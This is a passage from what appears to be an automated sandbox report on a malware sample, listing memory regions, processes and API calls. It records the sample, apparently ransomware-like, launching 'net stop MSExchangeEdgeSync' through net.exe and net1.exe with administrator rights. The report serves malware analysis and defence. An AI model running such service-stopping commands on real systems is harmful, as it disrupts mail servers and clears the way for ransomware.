AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9815 start_va = 0x7f959000 end_va = 0x7f959fff entry_point = 0x0 region_type = private name = "private_0x000000007f959000" filename = "" Region: id = 9816 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9817 start_va = 0xaecd620000 end_va = 0xaecd63ffff entry_point = 0x0 region_type = private name = "private_0x000000aecd620000" filename = "" Region: id = 9818 start_va = 0xaecd640000 end_va = 0xaecd653fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aecd640000" filename = "" Region: id = 9819 start_va = 0xaecd660000 end_va = 0xaecd69ffff entry_point = 0x0 region_type = private name = "private_0x000000aecd660000" filename = "" Region: id = 9820 start_va = 0x7df5ff8c0000 end_va = 0x7ff5ff8bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff8c0000" filename = "" Region: id = 9821 start_va = 0x7ff6c4840000 end_va = 0x7ff6c4862fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4840000" filename = "" Region: id = 9822 start_va = 0x7ff6c486c000 end_va = 0x7ff6c486dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c486c000" filename = "" Region: id = 9823 start_va = 0x7ff6c486e000 end_va = 0x7ff6c486efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c486e000" filename = "" Region: id = 9824 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 9825 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9826 start_va = 0xaecd620000 end_va = 0xaecd62ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aecd620000" filename = "" Region: id = 9827 start_va = 0xaecd630000 end_va = 0xaecd636fff entry_point = 0x0 region_type = private name = "private_0x000000aecd630000" filename = "" Region: id = 9828 start_va = 0xaecd6a0000 end_va = 0xaecd75dfff entry_point = 0xaecd6a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9829 start_va = 0xaecd760000 end_va = 0xaecd760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aecd760000" filename = "" Region: id = 9830 start_va = 0xaecd770000 end_va = 0xaecd86ffff entry_point = 0x0 region_type = private name = "private_0x000000aecd770000" filename = "" Region: id = 9831 start_va = 0xaecd870000 end_va = 0xaecd8affff entry_point = 0x0 region_type = private name = "private_0x000000aecd870000" filename = "" Region: id = 9832 start_va = 0xaecd8b0000 end_va = 0xaecd8b6fff entry_point = 0x0 region_type = private name = "private_0x000000aecd8b0000" filename = "" Region: id = 9833 start_va = 0xaecd8c0000 end_va = 0xaecda47fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aecd8c0000" filename = "" Region: id = 9834 start_va = 0xaecda50000 end_va = 0xaecda5ffff entry_point = 0x0 region_type = private name = "private_0x000000aecda50000" filename = "" Region: id = 9835 start_va = 0xaecda60000 end_va = 0xaecdbe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aecda60000" filename = "" Region: id = 9836 start_va = 0xaecdbf0000 end_va = 0xaecefeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aecdbf0000" filename = "" Region: id = 9837 start_va = 0xaeceff0000 end_va = 0xaeceff0fff entry_point = 0x0 region_type = private name = "private_0x000000aeceff0000" filename = "" Region: id = 9838 start_va = 0xaecf000000 end_va = 0xaecf000fff entry_point = 0x0 region_type = private name = "private_0x000000aecf000000" filename = "" Region: id = 9839 start_va = 0x7ff6c4740000 end_va = 0x7ff6c483ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4740000" filename = "" Region: id = 9840 start_va = 0x7ff6c486a000 end_va = 0x7ff6c486bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c486a000" filename = "" Region: id = 9841 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 9842 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 9843 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9844 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9845 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 9846 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9847 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9848 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9849 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9850 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9851 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9852 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 9853 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 9854 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 605 os_tid = 0xe78 Thread: id = 606 os_tid = 0xe1c Thread: id = 607 os_tid = 0x74c Process: id = "195" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x3948c000" os_pid = "0xe28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "193" os_parent_pid = "0x420" cmd_line = "net stop MSExchangeEdgeSync" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9868 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 9869 start_va = 0x9f0000 end_va = 0x49effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 9870 start_va = 0x49f0000 end_va = 0x4a0ffff entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 9871 start_va = 0x4a10000 end_va = 0x4a11fff entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 9872 start_va = 0x4a20000 end_va = 0x4a33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a20000" filename = "" Region: id = 9873 start_va = 0x4a40000 end_va = 0x4a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a40000" filename = "" Region: id = 9874 start_va = 0x4a80000 end_va = 0x4afffff entry_point = 0x0 region_type = private name = "private_0x0000000004a80000" filename = "" Region: id = 9875 start_va = 0x4b00000 end_va = 0x4b03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b00000" filename = "" Region: id = 9876 start_va = 0x4b10000 end_va = 0x4b10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b10000" filename = "" Region: id = 9877 start_va = 0x4b20000 end_va = 0x4b21fff entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 9878 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9879 start_va = 0x7f4a0000 end_va = 0x7f4c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4a0000" filename = "" Region: id = 9880 start_va = 0x7f4cb000 end_va = 0x7f4cdfff entry_point = 0x0 region_type = private name = "private_0x000000007f4cb000" filename = "" Region: id = 9881 start_va = 0x7f4ce000 end_va = 0x7f4cefff entry_point = 0x0 region_type = private name = "private_0x000000007f4ce000" filename = "" Region: id = 9882 start_va = 0x7f4cf000 end_va = 0x7f4cffff entry_point = 0x0 region_type = private name = "private_0x000000007f4cf000" filename = "" Region: id = 9883 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9884 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9885 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9886 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9887 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9888 start_va = 0x4ca0000 end_va = 0x4caffff entry_point = 0x0 region_type = private name = "private_0x0000000004ca0000" filename = "" Region: id = 9889 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9890 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9891 start_va = 0x4d40000 end_va = 0x4e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 9892 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 609 os_tid = 0xe6c Thread: id = 610 os_tid = 0xe7c Process: id = "196" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x11920000" os_pid = "0xe80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "195" os_parent_pid = "0xe28" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeEdgeSync" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9893 start_va = 0xd90000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 9894 start_va = 0xdb0000 end_va = 0xdb1fff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 9895 start_va = 0xdc0000 end_va = 0xdd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 9896 start_va = 0xde0000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 9897 start_va = 0xe20000 end_va = 0xe9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 9898 start_va = 0xea0000 end_va = 0xea3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 9899 start_va = 0xeb0000 end_va = 0xeb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000eb0000" filename = "" Region: id = 9900 start_va = 0xec0000 end_va = 0xec1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 9901 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 9902 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 9903 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9904 start_va = 0x7ec80000 end_va = 0x7eca2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec80000" filename = "" Region: id = 9905 start_va = 0x7eca5000 end_va = 0x7eca5fff entry_point = 0x0 region_type = private name = "private_0x000000007eca5000" filename = "" Region: id = 9906 start_va = 0x7eca6000 end_va = 0x7eca6fff entry_point = 0x0 region_type = private name = "private_0x000000007eca6000" filename = "" Region: id = 9907 start_va = 0x7ecad000 end_va = 0x7ecaffff entry_point = 0x0 region_type = private name = "private_0x000000007ecad000" filename = "" Region: id = 9908 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9909 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9910 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9911 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9912 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9913 start_va = 0x52b0000 end_va = 0x52bffff entry_point = 0x0 region_type = private name = "private_0x00000000052b0000" filename = "" Region: id = 9914 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9915 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9916 start_va = 0xef0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 9917 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9918 start_va = 0xd90000 end_va = 0xd9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d90000" filename = "" Region: id = 9919 start_va = 0xda0000 end_va = 0xda3fff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 9920 start_va = 0xff0000 end_va = 0x102ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 9921 start_va = 0x50c0000 end_va = 0x517dfff entry_point = 0x50c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9922 start_va = 0x5180000 end_va = 0x51fffff entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 9923 start_va = 0x5410000 end_va = 0x541ffff entry_point = 0x0 region_type = private name = "private_0x0000000005410000" filename = "" Region: id = 9924 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 9925 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 9926 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 9927 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 9928 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 9929 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 9930 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 9931 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 9932 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9933 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9934 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9935 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9936 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9937 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9938 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9939 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9940 start_va = 0x7eb80000 end_va = 0x7ec7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb80000" filename = "" Region: id = 9941 start_va = 0x7ecaa000 end_va = 0x7ecacfff entry_point = 0x0 region_type = private name = "private_0x000000007ecaa000" filename = "" Region: id = 9942 start_va = 0xdb0000 end_va = 0xdb3fff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 9943 start_va = 0xed0000 end_va = 0xed2fff entry_point = 0xed0000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 9944 start_va = 0x1030000 end_va = 0x1061fff entry_point = 0x1030000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 611 os_tid = 0xe8c [0135.689] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0135.689] __set_app_type (_Type=0x1) [0135.689] __p__fmode () returned 0x77ac4d6c [0135.689] __p__commode () returned 0x77ac5b1c [0135.689] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0135.689] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0135.689] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.689] GetConsoleOutputCP () returned 0x1b5 [0135.690] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0135.690] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.692] sprintf_s (in: _DstBuf=0xe9fd98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0135.692] setlocale (category=0, locale=".437") returned="English_United States.437" [0135.694] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0135.694] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0135.694] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeEdgeSync" [0135.694] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe9fb40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0135.694] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xe9fb34 | out: Buffer=0xe9fb34*=0xef7f50) returned 0x0 [0135.694] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xe9fb38 | out: Buffer=0xe9fb38*=0xef8088) returned 0x0 [0135.694] __iob_func () returned 0x77ac1208 [0135.694] _fileno (_File=0x77ac1208) returned 0 [0135.694] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0135.694] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0135.694] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0135.694] _wcsicmp (_String1="config", _String2="stop") returned -16 [0135.694] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0135.694] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0135.694] _wcsicmp (_String1="file", _String2="stop") returned -13 [0135.694] _wcsicmp (_String1="files", _String2="stop") returned -13 [0135.694] _wcsicmp (_String1="group", _String2="stop") returned -12 [0135.694] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0135.694] _wcsicmp (_String1="help", _String2="stop") returned -11 [0135.694] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0135.694] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0135.694] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0135.694] _wcsicmp (_String1="session", _String2="stop") returned -15 [0135.694] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0135.694] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0135.694] _wcsicmp (_String1="share", _String2="stop") returned -12 [0135.694] _wcsicmp (_String1="start", _String2="stop") returned -14 [0135.694] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0135.694] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0135.694] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0135.694] _wcsicmp (_String1="accounts", _String2="MSExchangeEdgeSync") returned -12 [0135.694] _wcsicmp (_String1="computer", _String2="MSExchangeEdgeSync") returned -10 [0135.694] _wcsicmp (_String1="config", _String2="MSExchangeEdgeSync") returned -10 [0135.694] _wcsicmp (_String1="continue", _String2="MSExchangeEdgeSync") returned -10 [0135.694] _wcsicmp (_String1="cont", _String2="MSExchangeEdgeSync") returned -10 [0135.694] _wcsicmp (_String1="file", _String2="MSExchangeEdgeSync") returned -7 [0135.694] _wcsicmp (_String1="files", _String2="MSExchangeEdgeSync") returned -7 [0135.694] _wcsicmp (_String1="group", _String2="MSExchangeEdgeSync") returned -6 [0135.694] _wcsicmp (_String1="groups", _String2="MSExchangeEdgeSync") returned -6 [0135.694] _wcsicmp (_String1="help", _String2="MSExchangeEdgeSync") returned -5 [0135.694] _wcsicmp (_String1="helpmsg", _String2="MSExchangeEdgeSync") returned -5 [0135.694] _wcsicmp (_String1="localgroup", _String2="MSExchangeEdgeSync") returned -1 [0135.694] _wcsicmp (_String1="pause", _String2="MSExchangeEdgeSync") returned 3 [0135.694] _wcsicmp (_String1="session", _String2="MSExchangeEdgeSync") returned 6 [0135.694] _wcsicmp (_String1="sessions", _String2="MSExchangeEdgeSync") returned 6 [0135.694] _wcsicmp (_String1="sess", _String2="MSExchangeEdgeSync") returned 6 [0135.694] _wcsicmp (_String1="share", _String2="MSExchangeEdgeSync") returned 6 [0135.694] _wcsicmp (_String1="start", _String2="MSExchangeEdgeSync") returned 6 [0135.695] _wcsicmp (_String1="stats", _String2="MSExchangeEdgeSync") returned 6 [0135.695] _wcsicmp (_String1="statistics", _String2="MSExchangeEdgeSync") returned 6 [0135.695] _wcsicmp (_String1="stop", _String2="MSExchangeEdgeSync") returned 6 [0135.695] _wcsicmp (_String1="time", _String2="MSExchangeEdgeSync") returned 7 [0135.695] _wcsicmp (_String1="user", _String2="MSExchangeEdgeSync") returned 8 [0135.695] _wcsicmp (_String1="users", 